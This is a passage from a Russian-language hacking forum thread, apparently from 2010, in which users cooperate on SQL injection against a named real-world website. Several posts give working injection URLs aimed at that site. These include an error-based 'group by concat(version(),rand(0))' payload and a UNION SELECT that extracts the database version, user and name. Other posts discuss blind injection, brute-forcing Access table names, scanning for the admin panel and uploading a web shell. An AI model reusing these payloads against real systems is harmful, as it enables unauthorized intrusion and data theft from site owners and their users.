 |
|
22.07.2010, 18:38
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от auth_root
Konqi
огромное тебе спасибо! =) Плюс.
Только вопрос, админку не нашел? =) Если нашел или шелл залил, не мог бы скинуть в пм? Хотелось бы конечно увидеть пошагово, какие ты проводишь манипуляции с запросами при взломе. Но это будет наглеж с моей стороны отбирать твое время. Поэтому я изучаю статейку, хотелось бы все повторить на практике, вплоть до заливки шелла.
админку даже не искал, это уже не мое дело )
проскан сайт (IntelliTamper,DirBuster, ArxScanSite...)
|
|
|
22.07.2010, 18:57
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
С нами:
8566197
Репутация:
18
|
|
Konqi
А доступа к системным таблицам нету, как я понимаю, или я не прав?
|
|
|
|
22.07.2010, 19:07
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами:
9709737
Репутация:
88
|
|
Yetisports
http://banken.ruilen.nl/random.php?catid=473
Тут блайнд, 4-я ветка
database: admin_ruilen
|
|
|
|
22.07.2010, 19:10
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от auth_root
Konqi
А доступа к системным таблицам нету, как я понимаю, или я не прав?
смотря на какой, нет доступа к Msysobjects, но есть доступ к Msysaccessobjects
а остальные(не дефолтные) таблицы нужно брутить
|
|
|
|
22.07.2010, 19:12
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от AKYLA
Yetisports
http://banken.ruilen.nl/random.php?catid=473
Тут блайнд, 4-я ветка
database: admin_ruilen
Зачем крутить как blind, если можно добиться вывода?
|
|
|
|
22.07.2010, 20:05
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
С нами:
8444531
Репутация:
53
|
|
AKYLA
Код:
http://banken.ruilen.nl/random.php?catid=473+group+by+concat(version(),rand(0)|0)+having+avg(0)--+
ололо ) думаем ребята )
|
|
|
|
22.07.2010, 20:12
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами:
9709737
Репутация:
88
|
|
Ну вообще да, можно вывести и так
Сообщение от None
http://banken.ruilen.nl/random.php?catid=473+UnIoN+SeLeCt+concat_ws%280x3a ,version%28%29,%20user%28%29,database%28%29%29--
|
|
|
|
22.07.2010, 20:15
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от AKYLA
Ну вообще да, можно вывести и так
Эм... А разница? /showpost.php?p=2262240&postcount=14459
Ах да, я нашёл в чем разница.
Твой способ обрезает часть версии.
|
|
|
|
22.07.2010, 20:22
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
С нами:
8444531
Репутация:
53
|
|
Сообщение от mailbrush
Эм... А разница? /showpost.php?p=2262240&postcount=14459
Ах да, я нашёл в чем разница.
Твой способ обрезает часть версии.
Что где обрезанно? О_О что то я вас не понимаю молодой человек Раскрути ее своим запросом, вот тебе и разница
PS:Хотя спорить бесполезно каждый кулик свое болото хвалит.
|
|
|
|
22.07.2010, 21:24
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами:
8440113
Репутация:
3
|
|
Объясните "что делает" эта запись rand(0)|0 ?? ну в смысле, для чего нужна вертикальная черта?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
